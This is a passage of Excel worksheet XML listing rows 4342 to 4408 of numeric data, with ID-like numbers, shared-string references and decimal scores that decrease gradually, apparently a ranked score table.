      </c>
    </row>
    <row r="4342" ht="15.75" customHeight="1">
      <c r="A4342" s="1">
        <v>5404.0</v>
      </c>
      <c r="B4342" s="2">
        <v>4.5496637E7</v>
      </c>
      <c r="C4342" s="2" t="s">
        <v>4133</v>
      </c>
      <c r="D4342" s="2">
        <v>1.0</v>
      </c>
      <c r="E4342" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4342" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="4343" ht="15.75" customHeight="1">
      <c r="A4343" s="1">
        <v>5881.0</v>
      </c>
      <c r="B4343" s="2">
        <v>4.7073493E7</v>
      </c>
      <c r="C4343" s="2" t="s">
        <v>4134</v>
      </c>
      <c r="D4343" s="2">
        <v>1.0</v>
      </c>
      <c r="E4343" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4343" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="4344" ht="15.75" customHeight="1">
      <c r="A4344" s="1">
        <v>10250.0</v>
      </c>
      <c r="B4344" s="2">
        <v>5.7547535E7</v>
      </c>
      <c r="C4344" s="2" t="s">
        <v>4135</v>
      </c>
      <c r="D4344" s="2">
        <v>1.0</v>
      </c>
      <c r="E4344" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4344" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="4345" ht="15.75" customHeight="1">
      <c r="A4345" s="1">
        <v>12152.0</v>
      </c>
      <c r="B4345" s="2">
        <v>2.7277959E7</v>
      </c>
      <c r="C4345" s="2" t="s">
        <v>4136</v>
      </c>
      <c r="D4345" s="2">
        <v>1.0</v>
      </c>
      <c r="E4345" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4345" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="4346" ht="15.75" customHeight="1">
      <c r="A4346" s="1">
        <v>14130.0</v>
      </c>
      <c r="B4346" s="2">
        <v>3.7893976E7</v>
      </c>
      <c r="C4346" s="2" t="s">
        <v>4137</v>
      </c>
      <c r="D4346" s="2">
        <v>1.0</v>
      </c>
      <c r="E4346" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4346" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="4347" ht="15.75" customHeight="1">
      <c r="A4347" s="1">
        <v>15675.0</v>
      </c>
      <c r="B4347" s="2">
        <v>4.3799915E7</v>
      </c>
      <c r="C4347" s="2" t="s">
        <v>4138</v>
      </c>
      <c r="D4347" s="2">
        <v>1.0</v>
      </c>
      <c r="E4347" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4347" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="4348" ht="15.75" customHeight="1">
      <c r="A4348" s="1">
        <v>21735.0</v>
      </c>
      <c r="B4348" s="2">
        <v>2.5805648E7</v>
      </c>
      <c r="C4348" s="2" t="s">
        <v>3883</v>
      </c>
      <c r="D4348" s="2">
        <v>1.0</v>
      </c>
      <c r="E4348" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4348" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="4349" ht="15.75" customHeight="1">
      <c r="A4349" s="1">
        <v>32681.0</v>
      </c>
      <c r="B4349" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C4349" s="2" t="s">
        <v>4139</v>
      </c>
      <c r="D4349" s="2">
        <v>1.0</v>
      </c>
      <c r="E4349" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4349" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="4350" ht="15.75" customHeight="1">
      <c r="A4350" s="1">
        <v>3061.0</v>
      </c>
      <c r="B4350" s="2">
        <v>3.6509694E7</v>
      </c>
      <c r="C4350" s="2" t="s">
        <v>4140</v>
      </c>
      <c r="D4350" s="2">
        <v>1.0</v>
      </c>
      <c r="E4350" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4350" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4351" ht="15.75" customHeight="1">
      <c r="A4351" s="1">
        <v>4167.0</v>
      </c>
      <c r="B4351" s="2">
        <v>4.1533668E7</v>
      </c>
      <c r="C4351" s="2" t="s">
        <v>4141</v>
      </c>
      <c r="D4351" s="2">
        <v>1.0</v>
      </c>
      <c r="E4351" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4351" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4352" ht="15.75" customHeight="1">
      <c r="A4352" s="1">
        <v>5306.0</v>
      </c>
      <c r="B4352" s="2">
        <v>4.5266572E7</v>
      </c>
      <c r="C4352" s="2" t="s">
        <v>4142</v>
      </c>
      <c r="D4352" s="2">
        <v>1.0</v>
      </c>
      <c r="E4352" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4352" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4353" ht="15.75" customHeight="1">
      <c r="A4353" s="1">
        <v>6193.0</v>
      </c>
      <c r="B4353" s="2">
        <v>4.7943997E7</v>
      </c>
      <c r="C4353" s="2" t="s">
        <v>4143</v>
      </c>
      <c r="D4353" s="2">
        <v>1.0</v>
      </c>
      <c r="E4353" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4353" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4354" ht="15.75" customHeight="1">
      <c r="A4354" s="1">
        <v>6947.0</v>
      </c>
      <c r="B4354" s="2">
        <v>4.9952487E7</v>
      </c>
      <c r="C4354" s="2" t="s">
        <v>4144</v>
      </c>
      <c r="D4354" s="2">
        <v>1.0</v>
      </c>
      <c r="E4354" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4354" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4355" ht="15.75" customHeight="1">
      <c r="A4355" s="1">
        <v>7107.0</v>
      </c>
      <c r="B4355" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C4355" s="2" t="s">
        <v>4145</v>
      </c>
      <c r="D4355" s="2">
        <v>1.0</v>
      </c>
      <c r="E4355" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4355" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4356" ht="15.75" customHeight="1">
      <c r="A4356" s="1">
        <v>11607.0</v>
      </c>
      <c r="B4356" s="2">
        <v>2.3039864E7</v>
      </c>
      <c r="C4356" s="2" t="s">
        <v>4146</v>
      </c>
      <c r="D4356" s="2">
        <v>1.0</v>
      </c>
      <c r="E4356" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4356" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4357" ht="15.75" customHeight="1">
      <c r="A4357" s="1">
        <v>13145.0</v>
      </c>
      <c r="B4357" s="2">
        <v>3.3777621E7</v>
      </c>
      <c r="C4357" s="2" t="s">
        <v>4147</v>
      </c>
      <c r="D4357" s="2">
        <v>1.0</v>
      </c>
      <c r="E4357" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4357" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4358" ht="15.75" customHeight="1">
      <c r="A4358" s="1">
        <v>14362.0</v>
      </c>
      <c r="B4358" s="2">
        <v>3.8951158E7</v>
      </c>
      <c r="C4358" s="2" t="s">
        <v>4148</v>
      </c>
      <c r="D4358" s="2">
        <v>1.0</v>
      </c>
      <c r="E4358" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4358" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4359" ht="15.75" customHeight="1">
      <c r="A4359" s="1">
        <v>14857.0</v>
      </c>
      <c r="B4359" s="2">
        <v>4.1065852E7</v>
      </c>
      <c r="C4359" s="2" t="s">
        <v>4149</v>
      </c>
      <c r="D4359" s="2">
        <v>1.0</v>
      </c>
      <c r="E4359" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4359" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4360" ht="15.75" customHeight="1">
      <c r="A4360" s="1">
        <v>14910.0</v>
      </c>
      <c r="B4360" s="2">
        <v>4.1187641E7</v>
      </c>
      <c r="C4360" s="2" t="s">
        <v>4150</v>
      </c>
      <c r="D4360" s="2">
        <v>1.0</v>
      </c>
      <c r="E4360" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4360" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="4361" ht="15.75" customHeight="1">
      <c r="A4361" s="1">
        <v>15720.0</v>
      </c>
      <c r="B4361" s="2">
        <v>4.3997508E7</v>
      </c>
      <c r="C4361" s="2" t="s">
        <v>4027</v>
      </c>
      <c r="D4361" s="2">
        <v>1.0</v>
      </c>
      <c r="E4361" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4361" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="4362" ht="15.75" customHeight="1">
      <c r="A4362" s="1">
        <v>18138.0</v>
      </c>
      <c r="B4362" s="2">
        <v>5.18275E7</v>
      </c>
      <c r="C4362" s="2" t="s">
        <v>4151</v>
      </c>
      <c r="D4362" s="2">
        <v>1.0</v>
      </c>
      <c r="E4362" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4362" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="4363" ht="15.75" customHeight="1">
      <c r="A4363" s="1">
        <v>1686.0</v>
      </c>
      <c r="B4363" s="2">
        <v>2.8427512E7</v>
      </c>
      <c r="C4363" s="2" t="s">
        <v>4152</v>
      </c>
      <c r="D4363" s="2">
        <v>1.0</v>
      </c>
      <c r="E4363" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4363" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4364" ht="15.75" customHeight="1">
      <c r="A4364" s="1">
        <v>3116.0</v>
      </c>
      <c r="B4364" s="2">
        <v>3.6775644E7</v>
      </c>
      <c r="C4364" s="2" t="s">
        <v>4153</v>
      </c>
      <c r="D4364" s="2">
        <v>1.0</v>
      </c>
      <c r="E4364" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4364" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4365" ht="15.75" customHeight="1">
      <c r="A4365" s="1">
        <v>3689.0</v>
      </c>
      <c r="B4365" s="2">
        <v>3.9501086E7</v>
      </c>
      <c r="C4365" s="2" t="s">
        <v>4154</v>
      </c>
      <c r="D4365" s="2">
        <v>1.0</v>
      </c>
      <c r="E4365" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4365" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4366" ht="15.75" customHeight="1">
      <c r="A4366" s="1">
        <v>4671.0</v>
      </c>
      <c r="B4366" s="2">
        <v>4.3146956E7</v>
      </c>
      <c r="C4366" s="2" t="s">
        <v>4155</v>
      </c>
      <c r="D4366" s="2">
        <v>1.0</v>
      </c>
      <c r="E4366" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4366" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4367" ht="15.75" customHeight="1">
      <c r="A4367" s="1">
        <v>4839.0</v>
      </c>
      <c r="B4367" s="2">
        <v>4.3681363E7</v>
      </c>
      <c r="C4367" s="2" t="s">
        <v>4156</v>
      </c>
      <c r="D4367" s="2">
        <v>1.0</v>
      </c>
      <c r="E4367" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4367" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4368" ht="15.75" customHeight="1">
      <c r="A4368" s="1">
        <v>7034.0</v>
      </c>
      <c r="B4368" s="2">
        <v>5.0135182E7</v>
      </c>
      <c r="C4368" s="2" t="s">
        <v>4157</v>
      </c>
      <c r="D4368" s="2">
        <v>1.0</v>
      </c>
      <c r="E4368" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4368" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4369" ht="15.75" customHeight="1">
      <c r="A4369" s="1">
        <v>7246.0</v>
      </c>
      <c r="B4369" s="2">
        <v>5.0704086E7</v>
      </c>
      <c r="C4369" s="2" t="s">
        <v>4158</v>
      </c>
      <c r="D4369" s="2">
        <v>1.0</v>
      </c>
      <c r="E4369" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4369" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4370" ht="15.75" customHeight="1">
      <c r="A4370" s="1">
        <v>7278.0</v>
      </c>
      <c r="B4370" s="2">
        <v>5.0786364E7</v>
      </c>
      <c r="C4370" s="2" t="s">
        <v>4159</v>
      </c>
      <c r="D4370" s="2">
        <v>1.0</v>
      </c>
      <c r="E4370" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4370" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4371" ht="15.75" customHeight="1">
      <c r="A4371" s="1">
        <v>8641.0</v>
      </c>
      <c r="B4371" s="2">
        <v>5.4331053E7</v>
      </c>
      <c r="C4371" s="2" t="s">
        <v>4160</v>
      </c>
      <c r="D4371" s="2">
        <v>1.0</v>
      </c>
      <c r="E4371" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4371" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4372" ht="15.75" customHeight="1">
      <c r="A4372" s="1">
        <v>12950.0</v>
      </c>
      <c r="B4372" s="2">
        <v>3.2384188E7</v>
      </c>
      <c r="C4372" s="2" t="s">
        <v>4161</v>
      </c>
      <c r="D4372" s="2">
        <v>1.0</v>
      </c>
      <c r="E4372" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4372" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4373" ht="15.75" customHeight="1">
      <c r="A4373" s="1">
        <v>13834.0</v>
      </c>
      <c r="B4373" s="2">
        <v>3.6777191E7</v>
      </c>
      <c r="C4373" s="2" t="s">
        <v>4162</v>
      </c>
      <c r="D4373" s="2">
        <v>1.0</v>
      </c>
      <c r="E4373" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4373" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4374" ht="15.75" customHeight="1">
      <c r="A4374" s="1">
        <v>15929.0</v>
      </c>
      <c r="B4374" s="2">
        <v>4.4699775E7</v>
      </c>
      <c r="C4374" s="2" t="s">
        <v>4163</v>
      </c>
      <c r="D4374" s="2">
        <v>1.0</v>
      </c>
      <c r="E4374" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4374" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4375" ht="15.75" customHeight="1">
      <c r="A4375" s="1">
        <v>16166.0</v>
      </c>
      <c r="B4375" s="2">
        <v>4.5623116E7</v>
      </c>
      <c r="C4375" s="2" t="s">
        <v>4164</v>
      </c>
      <c r="D4375" s="2">
        <v>1.0</v>
      </c>
      <c r="E4375" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4375" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4376" ht="15.75" customHeight="1">
      <c r="A4376" s="1">
        <v>17922.0</v>
      </c>
      <c r="B4376" s="2">
        <v>5.1159912E7</v>
      </c>
      <c r="C4376" s="2" t="s">
        <v>4165</v>
      </c>
      <c r="D4376" s="2">
        <v>1.0</v>
      </c>
      <c r="E4376" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4376" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4377" ht="15.75" customHeight="1">
      <c r="A4377" s="1">
        <v>18396.0</v>
      </c>
      <c r="B4377" s="2">
        <v>5.2616873E7</v>
      </c>
      <c r="C4377" s="2" t="s">
        <v>4166</v>
      </c>
      <c r="D4377" s="2">
        <v>1.0</v>
      </c>
      <c r="E4377" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4377" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4378" ht="15.75" customHeight="1">
      <c r="A4378" s="1">
        <v>19057.0</v>
      </c>
      <c r="B4378" s="2">
        <v>5.4578424E7</v>
      </c>
      <c r="C4378" s="2" t="s">
        <v>4167</v>
      </c>
      <c r="D4378" s="2">
        <v>1.0</v>
      </c>
      <c r="E4378" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4378" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4379" ht="15.75" customHeight="1">
      <c r="A4379" s="1">
        <v>20471.0</v>
      </c>
      <c r="B4379" s="2">
        <v>1.2796245E7</v>
      </c>
      <c r="C4379" s="2" t="s">
        <v>4168</v>
      </c>
      <c r="D4379" s="2">
        <v>1.0</v>
      </c>
      <c r="E4379" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4379" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4380" ht="15.75" customHeight="1">
      <c r="A4380" s="1">
        <v>28901.0</v>
      </c>
      <c r="B4380" s="2">
        <v>2.936452E7</v>
      </c>
      <c r="C4380" s="2" t="s">
        <v>4169</v>
      </c>
      <c r="D4380" s="2">
        <v>1.0</v>
      </c>
      <c r="E4380" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4380" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="4381" ht="15.75" customHeight="1">
      <c r="A4381" s="1">
        <v>1508.0</v>
      </c>
      <c r="B4381" s="2">
        <v>2.730316E7</v>
      </c>
      <c r="C4381" s="2" t="s">
        <v>4170</v>
      </c>
      <c r="D4381" s="2">
        <v>1.0</v>
      </c>
      <c r="E4381" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4381" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4382" ht="15.75" customHeight="1">
      <c r="A4382" s="1">
        <v>4929.0</v>
      </c>
      <c r="B4382" s="2">
        <v>4.3988028E7</v>
      </c>
      <c r="C4382" s="2" t="s">
        <v>4171</v>
      </c>
      <c r="D4382" s="2">
        <v>1.0</v>
      </c>
      <c r="E4382" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4382" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4383" ht="15.75" customHeight="1">
      <c r="A4383" s="1">
        <v>4984.0</v>
      </c>
      <c r="B4383" s="2">
        <v>4.4123452E7</v>
      </c>
      <c r="C4383" s="2" t="s">
        <v>4172</v>
      </c>
      <c r="D4383" s="2">
        <v>1.0</v>
      </c>
      <c r="E4383" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4383" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4384" ht="15.75" customHeight="1">
      <c r="A4384" s="1">
        <v>5463.0</v>
      </c>
      <c r="B4384" s="2">
        <v>4.5665643E7</v>
      </c>
      <c r="C4384" s="2" t="s">
        <v>4173</v>
      </c>
      <c r="D4384" s="2">
        <v>1.0</v>
      </c>
      <c r="E4384" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4384" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4385" ht="15.75" customHeight="1">
      <c r="A4385" s="1">
        <v>7912.0</v>
      </c>
      <c r="B4385" s="2">
        <v>5.2494672E7</v>
      </c>
      <c r="C4385" s="2" t="s">
        <v>4174</v>
      </c>
      <c r="D4385" s="2">
        <v>1.0</v>
      </c>
      <c r="E4385" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4385" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4386" ht="15.75" customHeight="1">
      <c r="A4386" s="1">
        <v>8790.0</v>
      </c>
      <c r="B4386" s="2">
        <v>5.4595363E7</v>
      </c>
      <c r="C4386" s="2" t="s">
        <v>4175</v>
      </c>
      <c r="D4386" s="2">
        <v>1.0</v>
      </c>
      <c r="E4386" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4386" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4387" ht="15.75" customHeight="1">
      <c r="A4387" s="1">
        <v>10015.0</v>
      </c>
      <c r="B4387" s="2">
        <v>5.7019245E7</v>
      </c>
      <c r="C4387" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="D4387" s="2">
        <v>1.0</v>
      </c>
      <c r="E4387" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4387" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4388" ht="15.75" customHeight="1">
      <c r="A4388" s="1">
        <v>10335.0</v>
      </c>
      <c r="B4388" s="2">
        <v>5.7716955E7</v>
      </c>
      <c r="C4388" s="2" t="s">
        <v>4176</v>
      </c>
      <c r="D4388" s="2">
        <v>1.0</v>
      </c>
      <c r="E4388" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4388" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4389" ht="15.75" customHeight="1">
      <c r="A4389" s="1">
        <v>12199.0</v>
      </c>
      <c r="B4389" s="2">
        <v>2.7500534E7</v>
      </c>
      <c r="C4389" s="2" t="s">
        <v>4177</v>
      </c>
      <c r="D4389" s="2">
        <v>1.0</v>
      </c>
      <c r="E4389" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4389" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4390" ht="15.75" customHeight="1">
      <c r="A4390" s="1">
        <v>12273.0</v>
      </c>
      <c r="B4390" s="2">
        <v>2.8117887E7</v>
      </c>
      <c r="C4390" s="2" t="s">
        <v>4178</v>
      </c>
      <c r="D4390" s="2">
        <v>1.0</v>
      </c>
      <c r="E4390" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4390" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4391" ht="15.75" customHeight="1">
      <c r="A4391" s="1">
        <v>12638.0</v>
      </c>
      <c r="B4391" s="2">
        <v>3.0332561E7</v>
      </c>
      <c r="C4391" s="2" t="s">
        <v>4179</v>
      </c>
      <c r="D4391" s="2">
        <v>1.0</v>
      </c>
      <c r="E4391" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4391" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4392" ht="15.75" customHeight="1">
      <c r="A4392" s="1">
        <v>14405.0</v>
      </c>
      <c r="B4392" s="2">
        <v>3.9191699E7</v>
      </c>
      <c r="C4392" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="D4392" s="2">
        <v>1.0</v>
      </c>
      <c r="E4392" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4392" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4393" ht="15.75" customHeight="1">
      <c r="A4393" s="1">
        <v>15928.0</v>
      </c>
      <c r="B4393" s="2">
        <v>4.4696906E7</v>
      </c>
      <c r="C4393" s="2" t="s">
        <v>4181</v>
      </c>
      <c r="D4393" s="2">
        <v>1.0</v>
      </c>
      <c r="E4393" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4393" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4394" ht="15.75" customHeight="1">
      <c r="A4394" s="1">
        <v>17130.0</v>
      </c>
      <c r="B4394" s="2">
        <v>4.882275E7</v>
      </c>
      <c r="C4394" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="D4394" s="2">
        <v>1.0</v>
      </c>
      <c r="E4394" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4394" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4395" ht="15.75" customHeight="1">
      <c r="A4395" s="1">
        <v>22057.0</v>
      </c>
      <c r="B4395" s="2">
        <v>3.0495833E7</v>
      </c>
      <c r="C4395" s="2" t="s">
        <v>4183</v>
      </c>
      <c r="D4395" s="2">
        <v>1.0</v>
      </c>
      <c r="E4395" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4395" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="4396" ht="15.75" customHeight="1">
      <c r="A4396" s="1">
        <v>13852.0</v>
      </c>
      <c r="B4396" s="2">
        <v>3.6899786E7</v>
      </c>
      <c r="C4396" s="2" t="s">
        <v>4184</v>
      </c>
      <c r="D4396" s="2">
        <v>1.0</v>
      </c>
      <c r="E4396" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4396" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="4397" ht="15.75" customHeight="1">
      <c r="A4397" s="1">
        <v>848.0</v>
      </c>
      <c r="B4397" s="2">
        <v>2.1697808E7</v>
      </c>
      <c r="C4397" s="2" t="s">
        <v>4185</v>
      </c>
      <c r="D4397" s="2">
        <v>1.0</v>
      </c>
      <c r="E4397" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4397" s="2">
        <v>0.107085346215781</v>
      </c>
    </row>
    <row r="4398" ht="15.75" customHeight="1">
      <c r="A4398" s="1">
        <v>10996.0</v>
      </c>
      <c r="B4398" s="2">
        <v>1.7548884E7</v>
      </c>
      <c r="C4398" s="2" t="s">
        <v>4186</v>
      </c>
      <c r="D4398" s="2">
        <v>1.0</v>
      </c>
      <c r="E4398" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4398" s="2">
        <v>0.1068376068376068</v>
      </c>
    </row>
    <row r="4399" ht="15.75" customHeight="1">
      <c r="A4399" s="1">
        <v>2884.0</v>
      </c>
      <c r="B4399" s="2">
        <v>3.5675803E7</v>
      </c>
      <c r="C4399" s="2" t="s">
        <v>4187</v>
      </c>
      <c r="D4399" s="2">
        <v>1.0</v>
      </c>
      <c r="E4399" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4399" s="2">
        <v>0.1067708333333334</v>
      </c>
    </row>
    <row r="4400" ht="15.75" customHeight="1">
      <c r="A4400" s="1">
        <v>1619.0</v>
      </c>
      <c r="B4400" s="2">
        <v>2.7859419E7</v>
      </c>
      <c r="C4400" s="2" t="s">
        <v>4188</v>
      </c>
      <c r="D4400" s="2">
        <v>1.0</v>
      </c>
      <c r="E4400" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4400" s="2">
        <v>0.1067708333333333</v>
      </c>
    </row>
    <row r="4401" ht="15.75" customHeight="1">
      <c r="A4401" s="1">
        <v>15190.0</v>
      </c>
      <c r="B4401" s="2">
        <v>4.2042698E7</v>
      </c>
      <c r="C4401" s="2" t="s">
        <v>4189</v>
      </c>
      <c r="D4401" s="2">
        <v>1.0</v>
      </c>
      <c r="E4401" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4401" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="4402" ht="15.75" customHeight="1">
      <c r="A4402" s="1">
        <v>19435.0</v>
      </c>
      <c r="B4402" s="2">
        <v>5.5702898E7</v>
      </c>
      <c r="C4402" s="2" t="s">
        <v>4190</v>
      </c>
      <c r="D4402" s="2">
        <v>1.0</v>
      </c>
      <c r="E4402" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4402" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="4403" ht="15.75" customHeight="1">
      <c r="A4403" s="1">
        <v>21902.0</v>
      </c>
      <c r="B4403" s="2">
        <v>2.7915652E7</v>
      </c>
      <c r="C4403" s="2" t="s">
        <v>4191</v>
      </c>
      <c r="D4403" s="2">
        <v>1.0</v>
      </c>
      <c r="E4403" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4403" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="4404" ht="15.75" customHeight="1">
      <c r="A4404" s="1">
        <v>210.0</v>
      </c>
      <c r="B4404" s="2">
        <v>1.4567583E7</v>
      </c>
      <c r="C4404" s="2" t="s">
        <v>4192</v>
      </c>
      <c r="D4404" s="2">
        <v>1.0</v>
      </c>
      <c r="E4404" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4404" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4405" ht="15.75" customHeight="1">
      <c r="A4405" s="1">
        <v>651.0</v>
      </c>
      <c r="B4405" s="2">
        <v>1.9935457E7</v>
      </c>
      <c r="C4405" s="2" t="s">
        <v>4193</v>
      </c>
      <c r="D4405" s="2">
        <v>1.0</v>
      </c>
      <c r="E4405" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4405" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4406" ht="15.75" customHeight="1">
      <c r="A4406" s="1">
        <v>4684.0</v>
      </c>
      <c r="B4406" s="2">
        <v>4.3217475E7</v>
      </c>
      <c r="C4406" s="2" t="s">
        <v>4194</v>
      </c>
      <c r="D4406" s="2">
        <v>1.0</v>
      </c>
      <c r="E4406" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4406" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4407" ht="15.75" customHeight="1">
      <c r="A4407" s="1">
        <v>5102.0</v>
      </c>
      <c r="B4407" s="2">
        <v>4.4518757E7</v>
      </c>
      <c r="C4407" s="2" t="s">
        <v>4195</v>
      </c>
      <c r="D4407" s="2">
        <v>1.0</v>
      </c>
      <c r="E4407" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4407" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4408" ht="15.75" customHeight="1">
      <c r="A4408" s="1">
        <v>5110.0</v>
      </c>
      <c r="B4408" s="2">
        <v>4.4541263E7</v>
      </c>
      <c r="C4408" s="2" t="s">
        <v>4196</v>
      </c>
      <c r="D4408" s="2">
        <v>1.0</v>
      </c>
      <c r="E4408" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4408" s="2">
        <v>0.1063218390804598</v>
